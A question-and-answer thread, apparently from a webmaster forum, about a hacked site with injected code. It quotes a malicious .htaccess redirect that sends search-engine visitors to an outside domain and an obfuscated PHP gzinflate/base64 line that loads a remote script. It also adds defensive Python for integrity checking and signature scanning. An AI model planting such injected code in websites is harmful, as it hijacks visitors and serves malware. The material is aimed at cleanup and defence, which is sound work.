How to prevent my website from getting malware injection attacks?

  • My website was banned as a malware website by Google. When I checked the code, I found out that some code had been injected into many files on my server. I cleaned everything manually, editing all files on my server (shared hosting) by searching all the files for a snippet of the injected code. Even the .htaccess file was modified by the attacker.

    There were two WordPress installations on the website, in two different subfolders of the website root, which were not updated. I updated both.

    Then Google removed the ban on my website.

    Yesterday, I found out that the .htaccess file on my website was again modified by the attacker. Here is the code:

    #b58b6f#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
    </IfModule>
    #/b58b6f#
    

    I searched for "b58b6f" in all the files, but I didn't find any. I think this is the only file modified by the most recent attack. I deleted this .htaccess file, as I don't need it.

    How was the hacker able to hack my website? How can I prevent this from happening again? How can I make my website more secure?

    Do you have your website in subversion (or similar)? An hourly `svn status` cron job can alert you very quickly to *any* changes and a manual `svn revert` can remove all the changes.

    "malware injection" is just a symptom of insecure code. An attacker needs a vulnerability such as SQL Injection or a Local File Include vulnerability in order to make this happen.
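The `svn status` cron idea above works only if the site lives in version control. As an added example (not from the question or its comments), the script below does the same job for a plain file tree: record a SHA-256 manifest once from a known-clean copy, then compare the live tree against it on a schedule and report added, modified and deleted files. The site layout, file contents and the "attacker" edits in `demo()` are all constructed here; the manifest should be written somewhere the FTP account cannot reach (or kept on another machine), since an attacker with the same credentials could otherwise update it along with the files.

```python
"""File-integrity check for a web root, as a substitute for `svn status`
when the site is not under version control (added example, constructed data).
"""
import hashlib
import json
import os
import tempfile


def hash_file(path):
    """SHA-256 of one file, read in chunks so large uploads do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every regular file under root (slash-separated relative path) to its hash."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def save_manifest(manifest, path):
    """Persist the baseline; keep this outside the web root and the FTP account's reach."""
    with open(path, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Report what changed since the baseline was taken (the cron job's output)."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "modified": modified, "deleted": deleted}


def demo():
    """Constructed scenario: clean site, then .htaccess is rewritten and a file is dropped."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "blog", "wp-content"))
    with open(os.path.join(root, ".htaccess"), "w") as f:
        f.write("RewriteEngine Off\n")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello'; ?>\n")

    manifest_path = os.path.join(tempfile.mkdtemp(), "manifest.json")  # off the web root
    save_manifest(build_manifest(root), manifest_path)

    # Simulated tampering, mirroring the pattern in the question: a marker
    # block appended to .htaccess and a new PHP file under the WordPress tree.
    with open(os.path.join(root, ".htaccess"), "a") as f:
        f.write("#b58b6f#\n# (constructed rewrite rule)\n#/b58b6f#\n")
    with open(os.path.join(root, "blog", "wp-content", "cache.php"), "w") as f:
        f.write("<?php /* constructed dropper */ ?>\n")

    return compare(load_manifest(manifest_path), build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Run `build_manifest` plus `save_manifest` once after a clean reinstall, then schedule `compare(load_manifest(...), build_manifest(root))` hourly and mail yourself any non-empty result; a modified `.htaccess` or a new `.php` file under `wp-content` is the signal that the credentials or the application have been compromised again.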

  • Cyril N. (Correct answer), 9 years ago

    It seems that the malware you encountered is the "daysofyorr.com virus" or MW:HTA:7.

    I suspect that you use FileZilla as your FTP client. If so, you must know that FileZilla stores the credentials of your websites in plain text. A virus may have accessed your credentials and then accessed all your registered websites, searching for WordPress installs in order to update the files by inserting this code.

    Now, you should:

    • Search your computer for any viruses, malware, etc.
    • Change the FTP password of all your registered FTP accounts saved in FileZilla
    • Eventually use a better FTP system, like WinSCP

    A late comment, but I suspect that you use FileZilla as your FTP client. Did you know that FileZilla stores your FTP site credentials (site/user/pass) in a plain text file in the %APPDATA% folder?

    And I also suspect there is a hidden malware on your computer. It grabbed your FileZilla credential files, and used them to change your header.php file in your theme folder. In fact, I suspect that you will find changed header.php in all of your themes folders.

    And if you are technical enough to look at your FTP log files, you will find the access to those files: a download, then an upload of the changed files. You might also find some random file names that were uploaded to your root ('home') folder, although those files were deleted by the hacker.

    And, you will find that the IP address in the FTP log of the hacker was from China.

    Recommendation: uninstall FileZilla, delete the FileZilla folder from %APPDATA% folder, change your FTP passwords (and your host passwords). And look for any changed header.php, footer.php, and wp-settings.php files.

    For the "daysofyorr.com virus", you can confirm this by checking some of your PHP files (like index.php), if you find this code:

    #b58b6f#
    echo(gzinflate(base64_decode("JctRCoAgDADQq8gO4P5DvcuwRUmhbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3aRWPuDwjeTcmwKJeFK5Qc=")));
    #/b58b6f#
    

    That's it!

    For information, it translates into:

    <script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>
    

    Which seems to lead to a 404 nowadays.

    Did you confirm it was one of those viruses? I would be curious to know which one :p (I would believe more in MW:HTA:7)
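The answer tells you to check your PHP files by hand for the `#b58b6f#` marker pair and the `echo(gzinflate(base64_decode("...")))` one-liner. As an added example (my code, not the answer's), the scanner below does that search across a whole tree and, for each hit, inflates the payload offline with the Python equivalent of PHP's `gzinflate` so you can read what it would have emitted without ever executing it. The infected and clean sample files are constructed in `demo()`, and the decoded script tag points at the placeholder host `example.invalid` rather than any real domain.

```python
"""Read-only scan for the two injection signatures described in the answer
(added example, constructed sample files)."""
import base64
import os
import re
import tempfile
import zlib

# echo(gzinflate(base64_decode("<base64>"))); as the injector writes it.
# The quote class also accepts curly quotes that copy/paste introduces, and
# whitespace inside the base64 (line wrapping) is tolerated.
GZ_B64 = re.compile(
    r"gzinflate\s*\(\s*base64_decode\s*\(\s*[\"'“]([A-Za-z0-9+/=\s]+)[\"'”]"
)
# Opening and closing marker with the same six-hex-digit id: #b58b6f# ... #/b58b6f#
MARKER = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S)


def gzinflate(b64_text):
    """Python equivalent of PHP gzinflate(base64_decode(...)): raw DEFLATE, no header."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64_text))
    return zlib.decompress(raw, -15).decode("utf-8", "replace")


def gzdeflate(text):
    """Inverse of gzinflate; used here only to build the constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(text.encode()) + comp.flush()).decode()


def scan_text(text):
    """Return one finding per marker block and per gzinflate/base64 payload."""
    findings = []
    for m in MARKER.finditer(text):
        findings.append({"kind": "marker", "id": m.group(1)})
    for m in GZ_B64.finditer(text):
        try:
            decoded = gzinflate(m.group(1))
        except (ValueError, zlib.error):
            decoded = None  # not valid base64/deflate; still worth a manual look
        findings.append({"kind": "gzinflate", "decoded": decoded})
    return findings


def scan_tree(root, exts=(".php", ".html", ".js", ".htaccess")):
    """Walk the web root and tag every finding with its slash-separated relative path."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                text = f.read()
            for finding in scan_text(text):
                finding["file"] = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append(finding)
    return hits


def demo():
    """Constructed tree: one infected index.php and one clean file using base64_decode."""
    root = tempfile.mkdtemp()
    payload = gzdeflate(
        '<script type="text/javascript" src="http://example.invalid/release.js"></script>'
    )
    infected = '<?php\n#b58b6f#\necho(gzinflate(base64_decode("%s")));\n#/b58b6f#\n?>\n' % payload
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write(infected)
    # Legitimate base64 use without gzinflate must not be flagged.
    with open(os.path.join(root, "functions.php"), "w") as f:
        f.write("<?php $logo = base64_decode(LOGO_DATA); ?>\n")
    return scan_tree(root)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Point `scan_tree` at a copy of the site downloaded over FTP rather than at the live tree, and treat a `decoded` value that contains a `<script src=...>` or an `eval` as confirmation that the file must be restored from a clean backup rather than patched in place; the `marker` id is also the string to grep for in your FTP logs to date the upload.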

License under CC-BY-SA with attribution


Content dated before 7/24/2021 11:53 AM